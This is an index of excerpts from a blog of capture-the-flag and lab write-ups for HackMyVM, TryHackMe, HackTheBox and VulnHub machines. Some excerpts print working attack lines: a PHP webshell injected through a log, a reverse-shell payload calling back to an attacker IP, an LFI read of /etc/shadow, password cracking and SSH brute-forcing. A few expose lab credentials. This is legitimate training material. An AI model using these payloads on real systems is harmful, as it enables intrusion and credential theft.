jabita
GET /building/index.php?page=/etc/shadow HTTP/1.1 LOL ┌──(root💀kali)-[/opt/hmv/jabita] └─# john hash -w=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key...
teacher
GET /access.php?id=<%3fphp+system($_GET['cmd'])%3b%3f> HTTP/1.1 writes parameter to log.php GET /log.php?cmd=php+-r+'$sock%3dfsockopen("10.10.10.73",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1 ┌──(root💀kali)-[/opt/hmv/teacher] └─# nc -nvlp 1234 listening on [any] 1234 ... connect to [10.10.10.73] from (UNKNOWN) [10.10.10.122] 57378 /bin/sh: 0: cant access tty; job control turned off $ python3 -c 'import pty;pty.spawn("/bin/bash");' www-data@Teacher:/var/www/html$ ls -lash ls -lash total 5.3M 4.0K drwxr-xr-x...
b3dr0ck
b3dr0ck, THM. Bit contrived I guess but quite fun actually and a little different and therefore worth noting an aspect or two. ┌──(root💀kali)-[/opt/thm/b3dr0ck] └─# nc 10.10.151.51 9009 You use this service to recover your client certificate and private key What are you looking for? certificate Sounds like you forgot your...
Quotient
THM Quotient, Windows unquoted service path, like this Firstly, login with xfreerdp not rdesktop. Because xfreerdp works and rdesktop doesn’t. ┌──(root💀kali)-[/opt/thm/quotient] └─# xfreerdp /u:"sage" /v:10.10.160.163 [06:36:18:262] [3317:3318] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position [06:36:18:262] [3317:3318] [WARN][com.freerdp.crypto] - CN = thm-quotient Password: [06:36:25:286] [3317:3318] [INFO][com.freerdp.gdi]...
Archetype
Need to make a few notes with this. Firstly, we have MSSql server creds obtained through an unsecured SMB share: ┌──(root💀kali)-[/opt/htb] └─# cat prod.dtsConfig <DTSConfiguration> <DTSConfigurationHeading> <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/> </DTSConfigurationHeading> <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String"> <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue> </Configuration> </DTSConfiguration> Now we use Impacket...
Ermahgerd
Well, it’s been 3 MONTHS since my last hacking post. Excuses, excuses I enrolled in a (free!) Undergraduate Certificate in Applied Technology. Why? Well, it was FREE. Also, I have absolutely no qualifications in technology at all, and I thought maybe it would be a good idea to get one,...
Plotted-TMS and ORETNOM23
There is a new TryHackMe ‘room’ (I still hate that term) called Plotted-TMS. This post is sort of about that, but not really. First, let’s get the Plotted-TMS bit out of the way. I have had a quick look at it but it’s under-provisioned on the free tier so it...
HackMyVM: Corrosion3
I got root blood on the new HackMyVM Medium rated machine Corrosion3. That is all. Writeup later.
2022-02-18 13:12:43 ordnaryday got user
2022-02-18 13:12:12 ordnaryday got firstroot
2022-02-18 10:25:02 d4t4s3c 👑 got firstuser
2022-02-18 08:19:46 Proxy got submission
THM: Dear QA
This was Dear QA from THM, an Easy rated “reverse engineering and exploit development” challenge. I’m not very good at these so I struggled a bit but got it done. Binary We were given a binary to inspect: DearQA.DearQA ┌──(root💀kali)-[/opt/thm/dearqa] └─# file DearQA.DearQA DearQA.DearQA: ELF 64-bit LSB executable, x86-64, version...
HackMyVM: Nightfall/Nightfail
I’ve done a couple more HackMyVM boxes and one thing on THM since I last wrote anything but I only want to write about one of them, and that’s Nightfall from HMV. Ports FTP and SSH only: PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD | ftp-anon: Anonymous FTP login...
HackMyVM: Talk & Speed
I’ve done a couple more HackMyVM boxes: Talk and Speed. Talk is Easy rated, Speed is Medium. Talk Talk was a webapp called chatME which we can find here and if we download it then it doesn’t appear to have any input sanitation so is probably open to SQLi. ┌──(root💀kali)-[/opt/hackmyvm/talk]...
HackMyVM: Superhuman, Brain and Eyes
I’ve done a few more HackMyVM boxes: Superhuman, Brain and Eyes. Superhuman and Brain were Easy rated, Eyes is Medium. Superhuman This was essentially weaponised guessing, followed by GTFOBins privesc (I think, I didn’t take notes). The only interesting (?) command was this one: ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.10.10.63/salome_and_FUZZ.zip -fc...
HackMyVM: University
I got bloods (User and Root) on the new HackMyVM easy rated machine University. No write-up yet so I don’t spoil it. That is all.
HackMyVM: Hopper
This is Hopper. It’s Medium rated, I liked it (a lot), and I didn’t manage it all on my own. There are some important learnings here. Ports SSH and HTTP only. HTTP Fuzzing reveals our first target: http://10.10.10.54/advanced-search/. The page says: Welcome to the private search Here you will be...
HackMyVM: Texte
This is Texte. It’s Medium rated, and it was pretty great. Ports SSH and HTTP only. HTTP The frontpage has a simple UI to upload a file, and says: Dont upload .PHP FILES! STOP BITCHING. Lol. I run a dirsearch, but there’s nothing else. I try a text file and...
HackMyVM: Breakout SMB note
I did Coming Soon, Method and Breakout from HackMyVM, but I really only want to write about Breakout, and only one specific part of it. SMB The box relies on obtaining a username via SMB enumeration. You should be able to do it with enum4linux, but that’s not working for...
HackMyVM: Secrets
I had a few days off, because I was away with no access to a PC. Now I’m back. This is Secrets. It’s Medium rated. Ports SSH and HTTP only. HTTP The frontpage says: I have to tell you a secret… And there is a comment: written by brad So...
HackMyVM: May
This is May. It’s Medium rated. Ports SSH, HTTP and Webmin on Port 10000. HTTP nmap says: http-title: Did not follow redirect to http://may.hmv So I add that to /etc/hosts. I visit the homepage and get this: admin: Web is under construction. Use Intranet. marie: Where are now the keys?...
HackMyVM: Beloved
This is Beloved. It’s Easy rated. Ports Just SSH and HTTP only. HTTP It’s wordpress, so we need wpscan. Kali hates wpscan for some reason; it used to work but now no dice. Presumably some update killed it: ┌──(root💀kali)-[/opt/hackmyvm/beloved] └─# wpscan -h Traceback (most recent call last): 12: from /usr/bin/wpscan:25:in...
HackMyVM: Gift, Pwned, Connection and Suidy
A four box multi-event. lol. Gift SSH and HTTP. HTTP says: Dont Overthink. Really, Its simple. ┌──(root💀kali)-[/opt/hackmyvm/gift] └─# hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.24 -I Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes...
HackMyVM: Confusion and Family2
A double helping this evening; two Medium machines from HackMyVM. We have Confusion and Family2. Family2 This will be brief, because it wasn’t super hard (or anything really new). Lots of ports but almost all irrelevant. Hit up the website for http://10.10.10.14/nicegiftformybaby ┌──(root💀kali)-[/opt/hackmyvm/family2] └─# cat nicegiftformybaby | xxd -r >...
HackMyVM: Condor
This is Condor. It’s Medium rated. Ports Just SSH and HTTP only, points to a web shell somehow. HTTP This is an exercise in enumeration. dirsearch gives us not much, but it does give this: [04:58:11] 200 - 20B - /cgi-bin/test.cgi This is pointing at shellshock, but the cgi isn’t...
HackMyVM: Government
I’ve been doing a couple of VMs from HackMyVM lately, and this was one of them. This is Government. It’s Medium rated. Ports Lots, lemme just dump my rustscan real quick: [~] The config file is expected to be at "/root/.rustscan.toml" [~] Automatically increasing ulimit value to 5000. Open 10.10.10.12:21...
THM: Road
This is THM: Road. Inspired by a real-world pentesting engagement Medium rated. Ports SSH and HTTP, we’ll assume we’re looking to compromise a website. Clicking around on the site we have a website for a courier company, we can register an account: POST /v2/admin/reg.php HTTP/1.1 Host: 10.10.55.104 User-Agent: Mozilla/5.0 (X11;...
Vulnhub: JANGOW: 1.0.1
This is JANGOW: 1.0.1 from VulnHub. Difficulty: Easy The secret to this box is enumeration! Did I ever mention I hate old kernel exploits? Yeah well this one works: https://gist.github.com/scumjr/17d91f20f73157c722ba2aea702985d2 ┌──(root💀kali)-[/opt/scripts] └─# updog -p 443 [+] Serving /opt/scripts... * Running on all addresses. WARNING: This is a development server. Do...
Vulnhub: Earth
This is THE PLANETS: EARTH from VulnHub. Difficulty: Easy Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience. Let’s go. PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.6 (protocol...
THM: Frank & Herby
It’s been a month; really. What have I been doing in all this time? Stuff, but nothing worth noting. I’ve done some VulnHub boxes, some RootMe stuff, a bit of THM and a few other things but nothing worth making any particular notes about. But, this one was a bit...
THM: Masterminds
Long time no post. I have been doing some stuff, but nothing too enthralling or particularly worth recording. With a lack of new content on VulnHub and interesting new content on THM, I’ve been having a bit of a look at Root-Me. This however, is about the new THM room...
THM: VulnNet2 Node
I decided to run back at a THM room I signed up for a long time ago but didn’t complete at the time. Here’s VulnNet2 Node. It’s easy rated but it’s not that easy; it’s also quite ‘realistic’, which I appreciate. Ports 8080 only; that’s a HTTP port running Node.js...
THM: Empline
Well after I wrote yesterday there hadn’t been anything good on THM for a bit they came and released Empline. And it is good. Medium rated. Ports My first scan brought up HTTP and SSH only. A later scan - after the box had been running for longer - added...
HACKABLE: III
There has been nothing good on THM for a little while now, so I’m working back through some older Vulnhub machines. Not that this is particularly old, but whatever. I had looz in my list so I thought I might do that; once I booted it up I remembered that...
FALL
I saw a few people mention DIGITALWORLD.LOCAL: FALL on the VulnHub discord so thought I would give it a go. Ports A few here; mostly for distraction I guess? SSH HTTP SMB (139/443) HTTPS MYSQL on 3306, and Cockpit on 9090 I checked that mysql wasn’t accessible and there was...
Beelzebub & Vikings
I did BEELZEBUB: 1 and VIKINGS: 1 from VulnHub. Ports Both of these boxes were HTTP and SSH only; I’ll mention Beelzebub first since it is freshest in my mind. HTTP Doing a GET on /index.php seemingly returns a 404 but hidden in the source code for that page is...
Updates 10 September
Long time no post eh. What have I been up to? Can’t remember lol. I did Horizontall from HackTheBox. I did a few crackmes. I did some stuff from THM. I tried to do Darkhole 2 from VulnHub but I couldn’t connect to it from my Kali VM. Whatever. Oh,...
Vulnhub: EVILBOX: ONE
This is EVILBOX: ONE from VulnHub. I’ve been busy, super tired and yeah whatever let’s make excuses. Nah. This box is easy rated and it is genuinely easy. Ports HTTP and SSH. HTTP Quick bit of feroxbusting: ┌──(root💀kali)-[/opt/vulnhub/evilbox] └─# feroxbuster -u http://192.168.1.92 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 200 -C 403 -x txt,php,log,bak...
Vulnhub: HACKER KID: 1.0.1
This is HACKER KID: 1.0.1 from VulnHub. I started this quite a while ago but didn’t finish it; now I have and this is how. I totally cheated doing this too by the way. Ports We’ve got DNS, HTTP on 80 and another HTTP port on 9999. Shortcut The quick...
Vulnhub: CHRONOS: 1
This is CHRONOS: 1 from VulnHub. It’s rated Medium, it’s by AL1ENUM and it’s very good, so give it a go. Ports SSH and two HTTP ports: 80 and 8000. HTTP At the main website, we have a page displaying the date and time. Looking at Burpsuite, we can see...
Vulnhub: THOTH TECH: 1
This is THOTH TECH: 1 from VulnHub. There is no information about this box. I’ve been banging on a few and not getting them completed lately so not many writeups. This one was easy and will be brief. I did complete the latest HTB machine Previse the other day but...
Vulnhub: CORROSION: 1
This is CORROSION: 1 from VulnHub: An easy box for beginners, but not too easy. Good Luck. Ports SSH and HTTP only. HTTP python3 /opt/dirsearch/dirsearch.py -u http://192.168.1.108 Dirsearch turns up /tasks/ which contains tasks_todo.txt. It says: Tasks that need to be completed Change permissions for auth log Change port 22...
Vulnhub: FUNBOX: SCRIPTKIDDIE
This will be brief. It’s FUNBOX: SCRIPTKIDDIE from VulnHub: As always, it’s a very easy box for beginners. Ports Quite a few: PORT STATE SERVICE REASON 21/tcp open ftp syn-ack ttl 64 22/tcp open ssh syn-ack ttl 64 25/tcp open smtp syn-ack ttl 64 80/tcp open http syn-ack ttl 64...
Vulnhub: FUNBOX: UNDER CONSTRUCTION!
This will also be brief. It’s FUNBOX: UNDER CONSTRUCTION! from VulnHub: As always, it’s a very easy box for beginners. Ports This one has SSH, HTTP and various mail ports - for SMTP, POP3 and IMAP. We’re interested in the web stuff. HTTP At http://192.168.1.78/catalog/ we find osCommerce Online Merchant...
It does work!
Away I was away again but I’m back; I’ve still been doing stuff so I’ll probably write some of it up. Anyway. New boxes on Vulnhub - I downloaded HACKER KID: 1, which was 4.7Gb(!) It says: Difficulty: Easy/Medium (Intermediate) This box is OSCP style and focused on enumeration with...
THM: Fowsniff and tomghost
THM: Stuff I’ve been doing a little bit of blue-teaming learning but I wanted to feel like I’d achieved something so I ran through Fowsniff and tomghost. I don’t have much to say about Fowsniff, although I will record the telnet commands used to connect to the POP3 server: ┌──(root💀kali)-[/opt/thm/fowsniff]...
THM: Cold VVars
THM: Cold VVars This is Cold VVars from THM. It’s Medium rated and I barely knew what was going on - I had to get some hints. Ports This has SMB plus two HTTP ports, on 8080 and 8082. We’re going to exploit a login page with XPath Injection. XPath...
Vulnhub: MOMENTUM: 2
I was away again; but this time I didn’t even have a laptop. Still, I try to do something every day so I did a bit of OverTheWire on my phone. It’s hard to do some of it where you’re expected to resize a terminal window to take advantage of...
THM: Git and Crumpets (and Harder, a bit)
THM: Git and Crumpets This is Git and Crumpets from THM. It’s Medium rated. For the avoidance of any doubt: I generally don’t publicise my writeups, and this is no exception. Ports Well; hard to say. SSH and HTTP certainly; rustscan doesn’t like it and nmap isn’t super keen either...
THM: Couch
THM: Couch This is Couch from THM. It’s Easy: Hack into a vulnerable database server that collects and stores data in JSON-based document formats, in this semi-guided challenge. This will be brief, because I’m only interested in the privesc (which wasn’t guided). Linpeas We’ve SSH’d in as atena and I...
Vulnhub: COFFEE ADDICTS: 1
Yesterday evening I did Explore from HTB but that’s a new machine so no writeup. It was pretty neat though. So, instead of that here is: COFFEE ADDICTS: 1 This is COFFEE ADDICTS: 1 from VulnHub. Our coffee shop has been hacked!! can you fix the damage and find who...
Vulnhub: RIPPER: 1
RIPPER: 1 This is RIPPER: 1 from VulnHub. This is a vulnerable linux box focused on web application testing along with showing the importance of enumeration. There are three users you need to compromise to read the root flag. Difficulty: Easy-Medium. Let’s go. Oh I also did Gaara and I’ve...
Updates 24 June 2021
Away I was away for a few days with just an old laptop setup with Kali as the OS. It didn’t have enough grunt to run any VMs, so it was THM only. Since there wasn’t much new I went and did a few older CTFs that I hadn’t done...
Vulnhub: TECH_SUPP0RT: 1
TECH_SUPP0RT: 1 This is TECH_SUPP0RT: 1 from VulnHub. Difficulty: Easy Background: The machine acts as a server setup by pop-up scammers which is under maintenance. Let’s go. Ports HTTP, SSH and SMB. Let’s begin with SMB. SMB We have anonymous login (I use smbclient) and just one file: enter.txt. ┌──(root💀kali)-[/opt/vulnhub/tech_support]...
Vulnhub: HACKSUDO: PROXIMACENTAURI
HACKSUDO: PROXIMACENTAURI This is HACKSUDO: PROXIMACENTAURI from VulnHub. Box created by hacksudo team members vishal Waghmare , Soham Deshmukh This box should be easy to medium . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh) and Website (https://hacksudo.com) Let’s go. Ports HTTP only. Well, I guess we...
Vulnhub: VULNCMS: 1
VulnCMS This is VULNCMS: 1 from VulnHub. We’ve got some new machines, so let’s go. Ports We’ve got SSH on 22; a website on 80. And then we’ve got Wordpress on 5000, Joomla on 8081 and Drupal on 9001. Where shall we start? Wordpress? nmap says: _http-generator: WordPress 5.7.2 That’s...
THM: That's The Ticket
THM: That’s The Ticket This is That’s The Ticket from THM. It’s Medium rated and says: IT Support is going to have a really bad day today, but don’t think they’re stupid! They have really strict firewalls! Using the IT support portal try and make your way into the admin...
THM: Mustacchio
THM: Mustacchio This is Mustacchio from THM. It’s easy rated with no hints; let’s go. Ports SSH, a ‘normal’ HTTP port (i.e. on Port 80) and nginx on port 8765. Normal HTTP Let’s start there. It’s a blog about mustaches; not much to see. Some enumeration leads us to /custom/js,...
Update 11 June 2021
CAP I did CAP from HTB. It’s active so no writeup. It’s probably the easiest modern HTB machine I’ve done. No new releases from VulnHub lately. I also did Basic Pentesting and yes it was basic. We have SSH, SMB and a webserver. We’ve got anonymous access on the SMB...
THM: Cat Pictures
Cat Pictures I made a forum where you can post cute cat pictures! Easy rated. This is Cat Pictures from THM. Ratings are weird; I did Linux Server Forensics the other day which is Medium rated; I’m not going to bother writing it up because it was so straightforward. Anyway....
THM: Prime et al
Updates I’ve just done Love on HTB; no writeup obviously - it’s still an active box. I also did Prime 1 from VulnHub the other day and ermagerd this is lazy but…. ## Ping the box, make sure it's up ┌──(root💀kali)-[/opt/vulnhub/prime1] └─# ping 192.168.1.237 PING 192.168.1.237 (192.168.1.237) 56(84) bytes of...
THM: Tribute et al
Updates I’ve just done Knife on HTB; no writeup obviously - it’s only a day old. I also finished MusicalStego which I can barely remember even starting, and then I did Tribute, which I don’t remember joining. I’m not going to write much, just a brief mention about Tribute. The...
Vulnhub: HACKSUDO: Fog and Blogger
HACKSUDO: Fog and Blogger I’ve recently done HACKSUDO: Fog and Blogger from Vulnhub but I’m struggling for motivation a bit at the moment so this will be pretty brief. Blogger first. Ports SSH and HTTP. HTTP This is basically a hidden Wordpress installation; it’s at http://blogger.thm/assets/fonts/blog/ Note we were told:...
THM: VulnNet: Roasted
THM: VulnNet: Roasted This is VulnNet: Roasted from THM. It’s rated as Easy but it’s … drum roll … Windows. Which I’m not very experienced at. I mean I use it all the time, but hacking? Not so much. Just as an aside, I’ve had so much trouble getting recent...
Vulnhub: ALFA: 1
ALFA: 1 This is ALFA: 1 from Vulnhub. It’s rated as Medium, and appears on the NetSecFocus Trophy Room list. I had been doing the DriftingBlues series; I’d done 7 and 6 then the privesc on 5 was like super CTF-ish and I was like meh and then I started...
THM: VulnNet: Internal
THM: VulnNet: Internal This is VulnNet: Internal from THM. It’s rated as Easy/Medium, and says: VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set...
Vulnhub: DriftingBlues6
DriftingBlues6 Since DriftingBlues7 was so quick I rolled into DriftingBlues6 and whaddya know - two successful Dirty Cow privescs in two days. What’s the world coming to? Ports HTTP only. HTTP robots.txt says: dont forget to add .zip extension to your dir-brute Okey dokey. It also disallows /textpattern/textpattern. ┌──(root💀kali)-[/opt/vulnhub/driftingblues6] └─#...
Vulnhub: DriftingBlues7
DriftingBlues7 Since I couldn’t get any more of the SunCSR boxes to run and there’s nothing new on THM, I took a shot at DriftingBlues7 on VulnHub. It says it is easy and they weren’t kidding; it took me 10 minutes. Ports Lots: PORT STATE SERVICE 22/tcp open ssh 66/tcp...
Vulnhub: Sumo and Geisha
Sumo and Geisha I decided to do some more of the SunCSR Team boxes on VulnHub because I saw someone talking them up; I had done a couple already. It wasn’t easy though - although not for the reasons you might think. VMWare I used to use VMWare for my...
THM: Unstable Twin
THM: Unstable Twin This is Unstable Twin from THM. It’s medium rated, and says: A Services based room, extracting information from HTTP Services and finding the hidden messages. I’m not going to writeup the whole thing, because it’s got stego and I hate stego. It’s web to find some SSH...
Vulnhub: SHENRON: 3
SHENRON: 3 This is SHENRON: 3 from Vulnhub. It says that it is ‘beginner’. Well some days I still feel like a beginner, so okey dokey. Actually I think that’s about right for the foothold, not so sure for the privesc. Anyway! Ports HTTP only. Web It’s wordpress, with a...
Vulnhub: MOMENTUM: 1
MOMENTUM: 1 This is MOMENTUM: 1 from Vulnhub. It says that it is ‘easy/medium’; ok. Ports SSH and HTTP only. Web The basic dirsearch: python3 /opt/dirsearch/dirsearch.py -u http://192.168.1.211 shows me /js and not much else. Javascript isn’t usually very interesting in a CTF but I look anyway; we have this:...
Vulnhub: HACKSUDO: SEARCH
HACKSUDO: SEARCH This is HACKSUDO: SEARCH from Vulnhub. It says: This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/7ujQrt393b) Ports SSH and HTTP only. Web The basic dirsearch: python3 /opt/dirsearch/dirsearch.py -u http://192.168.1.209 gives me a few things, including this: [06:23:34] 200 -...
THM: VulnNet: dotjar
VulnNet: dotjar This is VulnNet: dotjar from THM. It’s medium rated, and says: A new machine means a new web implementation. Foothold should be rather easy-going as long as you connect the dots. Privilege escalation might depend on your Java knowledge, don’t worry though, I’m rather a person who avoids...
Vulnhub: PYLINGTON: 1
PYLINGTON: 1 This is PYLINGTON: 1 from Vulnhub. It doesn’t have a rating but I’m going to say it was easy. Ports SSH and HTTP, and running on Arch Linux. That’s interesting, isn’t it? No? Whatever. Web We have an online python interpreter but in order to use it we...
Vulnhub: BLUEMOON: 2021
BLUEMOON: 2021 This is BLUEMOON: 2021 from Vulnhub. It is easy rated and I picked it to do because someone on the Vulnhub discord was looking for a write-up, which made me think maybe it was challenging. After that - and before I got a chance to do it myself...
Vulnhub: PHINEAS: 1
PHINEAS: 1 This is PHINEAS: 1 from Vulnhub. It says: an easy/medium web exploiting machine, with internal pivoting and CVE / RCE Let’s go. Ports We’ve got four open ports: SSH on port 22 HTTP on port 80 RPCBind on port 111, and MySQL/MariaDB on 3306 3306 If we try...
Vulnhub: HACKSUDO: 3
HACKSUDO: 3 This is HACKSUDO: 3 from Vulnhub. It says: This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh), and Find the user.txt and root.txt flag submit it to the mybox channel on Discord and get chance to get hacksudo machine hacking...
Vulnhub: SHENRON: 2
SHENRON: 2 This is SHENRON: 2 from Vulnhub. It says difficulty is ‘beginner’. It took me about an hour. Ports SSH on 22, plus HTTP on ports 80 and 8080 - hey, that’s a lot like the last one! HTTP/80 Looks to be a pretty basic template page with nothing...
Vulnhub: HACKSUDO: 1.0.1
HACKSUDO: 1.0.1 I was away for a couple of days. I try to do some practice everyday; the first day I did SimpleCTF from THM on my phone (I had no computer with me) which was kind of a pain in the ass but I got it done; next day...
Vulnhub: HACKSUDO: ALIENS
HACKSUDO: ALIENS This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh) This is HACKSUDO: ALIENS from Vulnhub. I also did COLDDWORLD: IMMERSION which was LFI to SSH login to editing a python script. I don’t have any more to say about that. Ports...
THM: VulnNet: Node
VulnNet: Node After the previous breach, VulnNet Entertainment states it won’t happen again. Can you prove they’re wrong? Easy rated. This is VulnNet: Node from THM. The Node refers to node.js, and this box has a node deserialization foothold. This isn’t a standard write-up; it’s all about the foothold. Ports...
THM: SafeZone
SafeZone CTF Designed by CTF lover for CTF lovers Medium rated. This is SafeZone from THM. It was pretty enjoyable; here’s what happened. Ports SSH and HTTP only. HTTP At index.php we have a login page but we have no credentials. There is a register.php where we can register an...
THM: Debug
Debug Linux Machine CTF! You’ll learn about enumeration, finding hidden password files and how to exploit php deserialization! Medium rated. This is Debug from THM. Everything seems to have been kicking my ass lately (yes, I prefer the American spelling for that expression). I’ve also been a bit lacking in...
Update March 24
Update I haven’t written a post for a bit; been feeling a bit burned out. Still doing something productive every day - no zero days. What have I done since I last wrote? HTB Time. This is an active machine, so no writeup just yet. THM Vulnet. This is basically...
HTB: Blocky
Blocky I’m getting out of order now. Whoops. Ports This has got: 21/tcp open ftp ProFTPD 1.3.5a 22/tcp open ssh OpenSSH 7.2p2 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 8192/tcp closed sophos 25565/tcp open minecraft Minecraft 1.11.2 FTP ProFTPD 1.3.5 (before 1.3.5a) had a horrible vulnerability; this version does not....
HTB: Valentine
Valentine Valentine was next after Grandpa. I’m pretty sure I once fell asleep watching the start of the Ippsec walkthrough of this but I didn’t remember anything about it. When it booted I thought I have a feeling this is SQLi. Lol. Ports SSH plus HTTP and HTTPS only. HTTP...
HTB: Grandpa
Grandpa Grandpa was next after Irked; I went in blind. Ports HTTP only. IIS 6.0 Nmap says: PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH |_ Potentially...
HTB: Irked
Irked Irked was next after Shocker; I went in blind. Ports This box had four unusual ports and no standard ports. We had: 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 46013/tcp open status 1 (RPC #100024) 65534/tcp open irc UnrealIRCd So it’s pretty much just UnrealIRCd, whatever that is....
HTB: Shocker
Shocker Shocker was not technically next in line; Beep was. I have started Beep but I’ll return to that later. I didn’t know what this was but I guessed from the name. Ports HTTP and SSH on a non-standard port: 2222. HTTP On the front page of the webserver is...
THM: Broker
Broker Paul and Max use a rather unconventional way to chat. They do not seem to know that eavesdropping is possible though… Medium rated. This is Broker from THM. Let’s go! Ports SSH, plus ports 1883, 8161 and 44885. What are those? 8161 At port 8161 we find ActiveMQ version...
HTB: Optimum
Optimum Optimum was after Nibbles; I went in blind and struggled a bit. Ports HTTP only. Well, that’s a start. HTTP On the webpage we see something called “HttpFileServer 2.3” is running; we can searchsploit this and find it’s trivially exploitable. There is a python exploit: python3 /opt/htb/optimum/49125.py 10.10.10.8 80...
THM: Wekor
Wekor CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services ;) Medium rated but surely that description gives a lot away? This is Wekor from THM. Ports SSH and HTTP only. VHOSTS Since we already know there is a VHOST/subdomain to find, I’ll run WFUZZ: wfuzz...
HTB: Nibbles
Nibbles After Bashed is Traceback but I’ve done that before; next is Nibbles. Ports SSH and HTTP only. HTTP The frontpage just says Hello world! but in the page source there is a comment about /nibbleblog, so we go there. It’s running a CMS called nibbleblog; searchsploit says there are...
HTB: Bashed
Bashed Next after Netmon is Bashed; I don’t know anything about it. I do wonder if it’s shellshock though, just based on the name. Ports HTTP only. Makes it easy, no? HTTP On the webpage we get some information about something called phpbash, and there is a link to a...
HTB: Netmon
Netmon In terms of pwns it goes Devel > OpenAdmin > Netmon but I’ve already done OpenAdmin so this is Netmon. Looking at the IP it’s fairly high (10.10.10.152), I reckon it is from not long before I joined HTB. I’ve never tried it before. Ports There are lots of...
HTB: Devel
Devel Following on from Blue in number of pwns is Devel. I’m going in blind. Ports Just FTP and HTTP on this one. The detail scan says anonymous FTP is allowed and the webserver is Microsoft IIS httpd 7.5. Shell We can login to FTP and put files. I’m far...
THM: Team
Team Beginner friendly boot2root machine It is aimed at beginners as I often see boxes that are “easy” but are often a bit harder! Whilst not difficult by any means, I still think this one will trip a few noobs up. This is Team from THM. Ports FTP, SSH and...
HTB: Blue
Blue Following on from Legacy in number of pwns is Blue. I have heard of this one, and the name is a giveaway. Is it pretty much a clone of Legacy? Ports Not exactly; there are a bunch more ports for a start: 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp...
HTB: Legacy
Legacy Following on from Jerry in number of pwns is Legacy. I go in blind. Ports It’s SMB only, on 139/445. Looks like Windows. SMB Given what this is, let’s try a special nmap scan: ┌──(root💀kali)-[/opt/htb/legacy] └─# nmap -p445 --script smb-vuln-ms17-010 10.10.10.4 Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05...
HTB: Jerry
Jerry Next cab off the rank when sorted by Pwnage is Jerry (after Lame). Again, I went into this one blind. Ports We’ve got one port only, 8080. This appears to be Windows, based on the TTL. 8080 We’ve got Apache Tomcat 7.0.88, and as we will soon see it’s...
HTB: Lame
Sorting I signed up for VIP and ordered the retired machines by owns, descending. I figured this was a reasonable proxy for difficulty, ignoring the user supplied ratings. That meant the first box was Lame. I have heard of it but I’ve never done it and I don’t know anything...
Subscriptions and directions
Vulnhub It’s been nearly 3 months since anything new has been uploaded to Vulnhub; I think it’s safe to say that OffSec don’t consider it a priority. I did look into Proving Grounds, but the free tier is just Vulnhub boxes that they host for you - lol. The paid...
THM: JPGChat
JPGChat Exploiting poorly made custom chatting service written in a certain language… The picture attached with this new room is the Python symbol, so I think we can guess what the language might be. Ports SSH and port 3000. What’s that? 3000 Let’s try telnet: └─# telnet 10.10.228.16 3000 Trying...
THM: Lunizz & Friends
There are a few things I’ll (briefly) mention here. REloaded This room is dedicated for the RE challenges, each challenge has unique concepts divided in each binaries. As if now only phase 1 is added will decide about phase 2 on response. This was REloaded from THM. There were five...
THM: Magician
Magician This magical website lets you convert image file formats. This is Magician from THM. It’s easy rated, but it wasn’t that easy. Ports FTP and two HTTP ports, on 8080 and 8081. FTP Anonymous login is available, and we get this message: ──(root💀kali)-[/opt/thm/magician] └─# ftp magician Connected to magician....
THM: Res and Watcher
Watcher I did watcher, it was okay but nothing to write about. We had LFI to get FTP creds, upload a PHP reverse shell using the FTP account then include it for RCE, then a few different things to move between users but nothing exciting. Res Hack into a vulnerable...
THM: En-Pass
En-pass Get what you can’t Think-out-of-the-box Yeah, if you say so. This released yesterday and I haven’t completed it; I probably won’t. It’s SSH and HTTP only, and you do a series of repetitive but not very interesting dirbuster/gobuster/dirsearch whatever to find an encrypted private SSH key, at: /web/resources/infoseek/configure/key The...
THM: Classic Passwd
Classic Passwd Practice your skills in reversing and get the flag bypassing the login david@DESKTOP-ROP5TSG:/mnt/c/Temp$ gdb ./Challenge.Challenge GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1 Copyright (C) 2018 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it....
Vulnhub: HACKNOS: OS-HAX
HACKNOS: OS-HAX Difficulty: Intermediate This is HACKNOS: OS-HAX from Vulnhub. Image from website > exiftool > hidden directory > brainfuck password > wordpress login > edit 404.php > shell > privesc www-data@jax:/dev/shm$ su web su web Password: Hacker@4514 $ sudo -u root /usr/bin/awk 'BEGIN {system("/bin/sh")}' sudo -u root /usr/bin/awk 'BEGIN...
THM: toc2
